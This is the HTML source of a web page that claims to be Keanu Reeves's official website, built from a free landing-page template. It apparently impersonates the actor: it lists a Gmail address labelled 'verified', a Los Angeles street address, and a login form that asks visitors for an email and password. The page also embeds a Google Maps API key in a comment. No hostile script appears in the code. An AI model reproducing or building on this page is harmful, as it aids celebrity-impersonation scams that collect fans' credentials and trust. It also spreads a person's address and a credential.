<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="Start your development with JohnDoe landing page.">
    <meta name="author" content="Devcrud">
    <link  rel="icon" type="image/x-icon" href="/public/assets/imgs/favicon.webp" />
    <title>Keanu Reeves Official Website</title>
    <!-- DESCRIPTION -->
    <meta name="description" content="Keanu Reeves is an Actor, Director, Producer, Musician and Angel Investor">
    <!-- SEARCH KEYWORDS -->
    <meta name="keywords" content="Keanu Reeves, Keanu, Reeves, John Wick, John, Wick, Actor, Canada, Musician, Director, Producer, Artist, Official Website">
    <!-- font icons -->
    <link rel="stylesheet" href="/public/assets/vendors/themify-icons/css/themify-icons.css">
    <!-- Bootstrap + JohnDoe main styles -->
	<link rel="stylesheet" href="/public/assets/css/johndoe.css">
</head>
<body data-spy="scroll" data-target=".navbar" data-offset="40" id="home">
    <nav class="navbar sticky-top navbar-expand-lg navbar-light bg-white" data-spy="affix" data-offset-top="510">
        <div class="container">
            <button class="navbar-toggler ml-auto" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
                <span class="navbar-toggler-icon"></span>
            </button>
            <div class="collapse mt-sm-20 navbar-collapse" id="navbarSupportedContent">
                <ul class="navbar-nav mr-auto">
                    <li class="nav-item">
                        <a href="#" class="nav-link">Home</a>
                    </li>
                    <li class="nav-item">
                        <a href="#about" class="nav-link">About</a>
                    </li>
                </ul>
                <ul class="navbar-nav brand">
                    <img src="/public/assets/imgs/avatar.jpg" alt="" class="brand-img">
                    <li class="brand-txt">
                        <h5 class="brand-title">Keanu Reeves</h5>
                        <div class="brand-subtitle">Actor | Artist</div>
                    </li>
                </ul>
                <ul class="navbar-nav ml-auto">
                    <li class="nav-item">
                        <a href="#portfolio" class="nav-link">Portfolio</a>
                    </li>
                    <li class="nav-item last-item">
                        <a href="#contact" class="nav-link">Contact</a>
                    </li>
                </ul>
            </div>
        </div>
    </nav>

    <section class="section bg-dark py-3">
        <div class="container text-center">
            <h2 class="text-light mb-3 font-weight-bold">Meet Keanu Reeves</h2>
        </div>
    </section>

    <!-- CONTACT SECTION -->
    <div style="padding:0 !important;" class="section contact" id="contact">
        <div class="container">
            <div class="row">
                <div class="col-lg-8">
                    <div class="contact-form-card">
                        <h4 class="contact-title">Login</h4>
                        <form class="thisForm" action="">
                            <div class="form-group">
                                <input name="user_email" class="form-control userEmail" type="email" placeholder="Email *" required>
                            </div>
                            <div class="form-group">
                                <input name="message" type="password" class="form-control messageText" placeholder="Confirm password" required>
                            </div>
                            <div class="form-group ">
                                <button type="submit" class="form-control btn btn-primary submitBtn">Submit</button>
                            </div>
                        </form>
                        <p style="text-align: center;">Not Registered? <a href="/register">Register</a></p>
                    </div>
                </div>
                <div class="col-lg-4">
                    <div class="contact-info-card">
                        <h4 class="contact-title">Get in touch</h4>
                        <div class="row mb-2">
                            <div class="col-1 pt-1 mr-1">
                                <i class="ti-mobile icon-md"></i>
                            </div>
                            <div class="col-10 ">
                                <h6 class="d-inline">Full Name : <br> <span class="text-muted">Keanu Charles Reeves</span></h6>
                            </div>
                        </div>
                        <div class="row mb-2">
                            <div class="col-1 pt-1 mr-1">
                                <i class="ti-map-alt icon-md"></i>
                            </div>
                            <div class="col-10">
                                <h6 class="d-inline">Address :<br> <span class="text-muted">9024 Thrasher Avenue, Los Angeles, CA 90069-1242.</span></h6>
                            </div>
                        </div>
                        <div class="row mb-2">
                            <div class="col-1 pt-1 mr-1">
                                <i class="ti-envelope icon-md"></i>
                            </div>
                            <div class="col-10">
                                <h6 class="d-inline">Email :<br> <span class="text-muted">keanureevesverified@gmail.com</span></h6>
                            </div>
                        </div>
                    </div>
                </div>
            </div>

        </div>
    </div>
    <!-- FOOTER SECTION -->
    <footer class="footer py-3">
        <div class="container">
            <p class="small mb-0 text-light">
                &copy; <script>document.write(new Date().getFullYear())</script><span class="text-danger" title="Bootstrap 4 Themes and Dashboards"> Keanu Charles Reeves</span></a> 
            </p>
        </div>
    </footer>

	<!-- core  -->
    <script src="/public/assets/vendors/jquery/jquery-3.4.1.js"></script>
    <script src="/public/assets/vendors/bootstrap/bootstrap.bundle.js"></script>

    <!-- bootstrap 3 affix -->
    <script src="/public/assets/vendors/bootstrap/bootstrap.affix.js"></script>

    <!-- Isotope  -->
    <script src="/public/assets/vendors/isotope/isotope.pkgd.js"></script>
    
    <!-- Google mpas -->
    <!-- <script async defer src="https://maps.googleapis.com/maps/api/js?key=AIzaSyCtme10pzgKSPeJVJrG1O3tjR6lk98o4w8&callback=initMap"></script> -->

    <!-- JohnDoe js -->
    <script src="/public/assets/js/johndoe.js"></script>
</body>
</html>
